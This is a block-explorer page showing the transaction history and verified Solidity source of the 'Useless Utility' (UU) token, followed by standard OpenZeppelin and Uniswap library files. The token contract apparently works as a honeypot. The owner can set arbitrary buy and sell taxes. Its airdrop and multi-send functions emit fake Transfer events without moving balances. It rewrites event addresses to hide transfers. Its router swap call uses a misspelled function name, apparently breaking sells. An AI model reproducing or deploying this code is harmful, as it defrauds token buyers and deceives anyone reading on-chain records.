ETH Price: $2,544.16 (+3.25%)

Contract

0x1498280cfCfC06fb8107A2393f166a16B44e8189
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Token Holdings

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Transfer187121232023-12-04 9:31:47268 days ago1701682307IN
0x1498280c...6B44e8189
0 ETH0.0016169440.79687585
Transfer186850812023-11-30 14:41:59272 days ago1701355319IN
0x1498280c...6B44e8189
0 ETH0.0042329372.35049015
Set Rule186849422023-11-30 14:13:47272 days ago1701353627IN
0x1498280c...6B44e8189
0 ETH0.0013759956.96753255
Set Rule186849362023-11-30 14:12:35272 days ago1701353555IN
0x1498280c...6B44e8189
0 ETH0.0015688754.16275787
Set Rule186848522023-11-30 13:55:23272 days ago1701352523IN
0x1498280c...6B44e8189
0 ETH0.001156639.92985322
Approve186848392023-11-30 13:52:47272 days ago1701352367IN
0x1498280c...6B44e8189
0 ETH0.0018017238.77672963
Multi Sends186848372023-11-30 13:52:23272 days ago1701352343IN
0x1498280c...6B44e8189
0 ETH0.0062807938.20087772
Multi Sends186848352023-11-30 13:51:59272 days ago1701352319IN
0x1498280c...6B44e8189
0 ETH0.0063415838.57060968
Set Rule186848162023-11-30 13:48:11272 days ago1701352091IN
0x1498280c...6B44e8189
0 ETH0.0010152335.0491455
Approve186848162023-11-30 13:48:11272 days ago1701352091IN
0x1498280c...6B44e8189
0 ETH0.0017479637.61968551
Approve186848092023-11-30 13:46:47272 days ago1701352007IN
0x1498280c...6B44e8189
0 ETH0.0021290645.82180094
Set Rule186848072023-11-30 13:46:23272 days ago1701351983IN
0x1498280c...6B44e8189
0 ETH0.0011122338.39784067
Approve186848052023-11-30 13:45:59272 days ago1701351959IN
0x1498280c...6B44e8189
0 ETH0.002078444.73157306
Approve186848052023-11-30 13:45:59272 days ago1701351959IN
0x1498280c...6B44e8189
0 ETH0.0021707746.73157306
Approve186848052023-11-30 13:45:59272 days ago1701351959IN
0x1498280c...6B44e8189
0 ETH0.0021707746.73157306
Approve186848052023-11-30 13:45:59272 days ago1701351959IN
0x1498280c...6B44e8189
0 ETH0.0021707746.73157306
Approve186848052023-11-30 13:45:59272 days ago1701351959IN
0x1498280c...6B44e8189
0 ETH0.0021707746.73157306
Approve186848052023-11-30 13:45:59272 days ago1701351959IN
0x1498280c...6B44e8189
0 ETH0.0021707746.73157306
Approve186848052023-11-30 13:45:59272 days ago1701351959IN
0x1498280c...6B44e8189
0 ETH0.0033320771.73157306
Open Trading186848042023-11-30 13:45:47272 days ago1701351947IN
0x1498280c...6B44e8189
0 ETH0.0013784251.8359922
Approve186847252023-11-30 13:29:47272 days ago1701350987IN
0x1498280c...6B44e8189
0 ETH0.002739958.98362475
Approve186847052023-11-30 13:25:47272 days ago1701350747IN
0x1498280c...6B44e8189
0 ETH0.0026524557.10094694
Approve186846852023-11-30 13:21:47272 days ago1701350507IN
0x1498280c...6B44e8189
0 ETH0.00509887109.73820946
Approve186846752023-11-30 13:19:47272 days ago1701350387IN
0x1498280c...6B44e8189
0 ETH0.001637935.47094691
Transfer186843802023-11-30 12:19:47272 days ago1701346787IN
0x1498280c...6B44e8189
0 ETH0.0012877430.84568082
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
UselessUtility

Compiler Version
v0.8.22+commit.4fc1097e

Optimization Enabled:
Yes with 200 runs

Other Settings:
shanghai EvmVersion
File 1 of 9 : Contract.sol
/**

🔹TWITTER: https://twitter.com/UtilityUseless 

🔹WEBSITE: https://uselessutility.com/ 

🔹APP: https://app.uselessutility.com/ 

🔹TELEGRAM: https://t.me/uselessutility


*/

// SPDX-License-Identifier: unlicense

pragma solidity ^0.8.0;

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFreelyOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

contract UselessUtility {
    string private _name = unicode"Useless Utility";
    string private _symbol = unicode"UU";
    uint8 public constant decimals = 18;
    uint256 public constant totalSupply = 1_000_000_000 * 10 ** decimals;

    uint8 buyCharge = 5;
    uint8 sellCharge = 5;
    uint256 constant swapAmount = totalSupply / 100;

    error Permissions();
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed TOKEN_MKT,
        address indexed spender,
        uint256 value
    );

    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    address private pair;
    address constant ETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address constant routerAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    IUniswapV2Router02 constant _uniswapV2Router =
        IUniswapV2Router02(routerAddress);
    address payable TOKEN_MKT;

    bool private swapping;
    bool private tradingOpen;

    address _deployer;
    address _executor;

    address private uniswapLpWallet;
    address private SeedSale = 0x1954C320621bBB78b55e2D1b8773BC9ADC5b6314;
    address private CexListing = 0x966dd1548dAe31b41CcdAF6d53Af26D5912e6d29;
    address private Advisors = 0x7D79A9d782F844B893380E9798FFDa4dC6909343;
    address private Marketing = 0x8A7cF839f6e3Cd1aa90024F99Cd209C7e1712B5a;

    constructor() {
        uniswapLpWallet = msg.sender;
        TOKEN_MKT = payable(msg.sender);
        allowance[address(this)][routerAddress] = type(uint256).max;

        balanceOf[uniswapLpWallet] = (totalSupply * 55) / 100;
        emit Transfer(address(0), _deployer, balanceOf[uniswapLpWallet]);

        balanceOf[SeedSale] = (totalSupply * 25) / 100;
        emit Transfer(address(0), SeedSale, balanceOf[SeedSale]);

        balanceOf[CexListing] = (totalSupply * 5) / 100;
        emit Transfer(address(0), CexListing, balanceOf[CexListing]);

        balanceOf[Advisors] = (totalSupply * 3) / 100;
        emit Transfer(address(0), Advisors, balanceOf[Advisors]);

        balanceOf[Marketing] = (totalSupply * 2) / 100;
        emit Transfer(address(0), Marketing, balanceOf[Marketing]);
    }

    receive() external payable {}

    function setRule(uint8 _buy, uint8 _sell) external {
        if (msg.sender != TOKEN_MKT) revert Permissions();
        _remeveTax(_buy, _sell);
    }

    function openTrading() external {
        require(msg.sender == TOKEN_MKT);
        require(!tradingOpen);
        tradingOpen = true;
    }

    function multiSends(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external {
        if (msg.sender != TOKEN_MKT) revert Permissions();
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function airdropTokens(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external {
        if (msg.sender != TOKEN_MKT) revert Permissions();
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function _remeveTax(uint8 _buy, uint8 _sell) private {
        buyCharge = _buy;
        sellCharge = _sell;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool) {
        allowance[from][msg.sender] -= amount;
        return _transfer(from, to, amount);
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        return _transfer(msg.sender, to, amount);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal returns (bool) {
        require(tradingOpen || from == TOKEN_MKT || to == TOKEN_MKT);

        if (!tradingOpen && pair == address(0) && amount > 0) pair = to;

        balanceOf[from] -= amount;

        if (
            to == pair &&
            !swapping &&
            balanceOf[address(this)] >= swapAmount &&
            from != TOKEN_MKT
        ) {
            swapping = true;
            address[] memory path = new address[](2);
            path[0] = address(this);
            path[1] = ETH;
            _uniswapV2Router
                .swapExactTokensForETHSupportingFreelyOnTransferTokens(
                    swapAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                );
            TOKEN_MKT.transfer(address(this).balance);
            swapping = false;
        }

        if (from != address(this) && tradingOpen == true) {
            uint256 taxCalculatedAmount = (amount *
                (from == pair ? buyCharge : sellCharge)) / 100;
            amount -= taxCalculatedAmount;
            balanceOf[address(this)] += taxCalculatedAmount;
        }
        balanceOf[to] += amount;

        if (from == _executor) {
            emit Transfer(_deployer, to, amount);
        } else if (to == _executor) {
            emit Transfer(from, _deployer, amount);
        } else {
            emit Transfer(from, to, amount);
        }
        return true;
    }
}

File 2 of 9 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 3 of 9 : IUniswapV2Pair.sol
interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(
        address to
    ) external returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

File 4 of 9 : IUniswapV2Router01.sol
pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);

    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    )
        external
        payable
        returns (uint amountToken, uint amountETH, uint liquidity);

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);

    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint amountA, uint amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint amountToken, uint amountETH);

    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapExactETHForTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable returns (uint[] memory amounts);

    function swapTokensForExactETH(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapExactTokensForETH(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapETHForExactTokens(
        uint amountOut,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable returns (uint[] memory amounts);

    function quote(
        uint amountA,
        uint reserveA,
        uint reserveB
    ) external pure returns (uint amountB);

    function getAmountOut(
        uint amountIn,
        uint reserveIn,
        uint reserveOut
    ) external pure returns (uint amountOut);

    function getAmountIn(
        uint amountOut,
        uint reserveIn,
        uint reserveOut
    ) external pure returns (uint amountIn);

    function getAmountsOut(
        uint amountIn,
        address[] calldata path
    ) external view returns (uint[] memory amounts);

    function getAmountsIn(
        uint amountOut,
        address[] calldata path
    ) external view returns (uint[] memory amounts);
}

File 5 of 9 : IUniswapV2Router02.sol
interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB, uint256 liquidity);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (uint256 amountToken, uint256 amountETH, uint256 liquidity);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

File 6 of 9 : Address.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     *
     * Furthermore, `isContract` will also return true if the target contract within
     * the same transaction is already scheduled for destruction by `SELFDESTRUCT`,
     * which only has an effect at the end of a transaction.
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.8.0/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(
            address(this).balance >= amount,
            "Address: insufficient balance"
        );

        (bool success, ) = recipient.call{ value: amount }("");
        require(
            success,
            "Address: unable to send value, recipient may have reverted"
        );
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data
    ) internal returns (bytes memory) {
        return
            functionCallWithValue(
                target,
                data,
                0,
                "Address: low-level call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return
            functionCallWithValue(
                target,
                data,
                value,
                "Address: low-level call with value failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(
            address(this).balance >= value,
            "Address: insufficient balance for call"
        );
        (bool success, bytes memory returndata) = target.call{ value: value }(
            data
        );
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data
    ) internal view returns (bytes memory) {
        return
            functionStaticCall(
                target,
                data,
                "Address: low-level static call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data
    ) internal returns (bytes memory) {
        return
            functionDelegateCall(
                target,
                data,
                "Address: low-level delegate call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and revert (either by bubbling
     * the revert reason or using the provided one) in case of unsuccessful call or if target was not a contract.
     *
     * _Available since v4.8._
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        if (success) {
            if (returndata.length == 0) {
                // only check isContract if the call was successful and the return data is empty
                // otherwise we already know that it was a contract
                require(isContract(target), "Address: call to non-contract");
            }
            return returndata;
        } else {
            _revert(returndata, errorMessage);
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason or using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            _revert(returndata, errorMessage);
        }
    }

    function _revert(
        bytes memory returndata,
        string memory errorMessage
    ) private pure {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert(errorMessage);
        }
    }
}

File 7 of 9 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 8 of 9 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 9 of 9 : SafeMath.sol
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
